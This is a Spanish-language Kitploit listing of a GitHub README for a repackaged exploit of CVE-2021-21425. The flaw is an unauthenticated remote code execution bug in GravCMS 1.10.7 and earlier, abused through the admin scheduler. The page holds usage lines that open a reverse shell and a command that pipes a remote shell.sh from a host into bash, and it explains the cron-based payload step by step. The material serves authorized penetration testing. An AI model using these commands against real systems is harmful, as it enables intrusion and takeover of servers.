Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-21425 — CVE-2021-21425 - GravCMS 1.10.7 RCE no autenticado a través del Programador. Exploit mejorado con argumentos CLI y codificación base64 automática. | Kitploit
Herramientas/GitHubGitHub/d4ytox/cve-2021-21425
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubd4ytox/cve-2021-21425

CVE-2021-21425

CVE-2021-21425 - GravCMS 1.10.7 RCE no autenticado a través del Programador. Exploit mejorado con argumentos CLI y codificación base64 automática.

Ver Repositorio
111hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-21425 - GravCMS RCE no autenticado

Prueba de concepto mejorada para CVE-2021-21425, una vulnerabilidad de ejecución remota de código no autenticado en GravCMS <= 1.10.7 mediante escritura arbitraria de YAML en el planificador.

Créditos

Este es un trabajo derivado. La vulnerabilidad y el exploit original no son míos.

RolQuién
Vulnerabilidad descubierta porMehmet Ince (@mdisec), PRODAFT / INVICTUS Europe — marzo de 2021
PoC original por"legend" — Exploit-DB EDB-49973
Modificaciones en este repositorio pord4ytox

Qué cambia esta versión

El EDB-49973 original requiere editar manualmente valores codificados en el script. Esta versión añade:

  • Argumentos de línea de comandos para target, LHOST, LPORT
  • Codificación base64 automática del payload de reverse shell
  • Soporte para comandos personalizados (-c)
  • Manejo de errores y salida de estado

Son cambios de usabilidad sobre un exploit existente. No se reclama investigación de vulnerabilidades.

Vulnerabilidad

CampoValor
CVECVE-2021-21425
EDB-ID49973
Afecta aGravCMS <= 1.10.7
TipoRCE no autenticado
CVSS9.8 (Crítico)

El plugin Grav Admin no verifica la autenticación en ciertas rutas de administración, lo que permite a usuarios no autenticados escribir configuración YAML arbitraria. Este exploit abusa de la configuración del planificador para crear una tarea cron que ejecuta código PHP arbitrario.

Uso

# Reverse shell
python3 exploit.py -t http://target -s <LHOST> <LPORT>

# Comando personalizado
python3 exploit.py -t http://target -c "id"

Ejemplos

# Obtener reverse shell en el objetivo
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444

# Ejecutar comando
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"

Requisitos

pip install requests

Cómo funciona

  1. Obtiene /admin para extraer el token admin-nonce (no se requiere autenticación debido a la vulnerabilidad)
  2. Envía un POST a /admin/config/scheduler con una configuración de tarea cron maliciosa
  3. El planificador ejecuta el payload PHP mediante /usr/bin/php -r eval(base64_decode(...))
  4. PHP escribe el reverse shell decodificado de base64 en /tmp/rev.sh y lo ejecuta

La tarea cron se ejecuta cada minuto (* * * * *), por lo que la shell llega en menos de 60 segundos.

Cronología

  • 2021-03-18 - Vulnerabilidad encontrada por Mehmet Ince durante una prueba de penetración
  • 2021-03-29 - Divulgada
  • 2021-04-01 - Parcheada en Grav Admin Plugin 1.10.8

Referencias

  • Entrada en NVD
  • Aviso de seguridad de GitHub GHSA-6f53-6qgv-39pj
  • Writeup original de Mehmet Ince (Pentest Blog)
  • PoC original - Exploit-DB EDB-49973

Licencia

MIT, aplicándose únicamente a las modificaciones de este repositorio. El PoC original no tiene licencia, por lo que sigue siendo todos los derechos reservados por su autor. Consulta LICENSE para el aviso completo de atribución.

Descargo de responsabilidad

Solo para pruebas de seguridad autorizadas. Asegúrate de tener permiso por escrito antes de probar contra cualquier sistema.

Descargar herramienta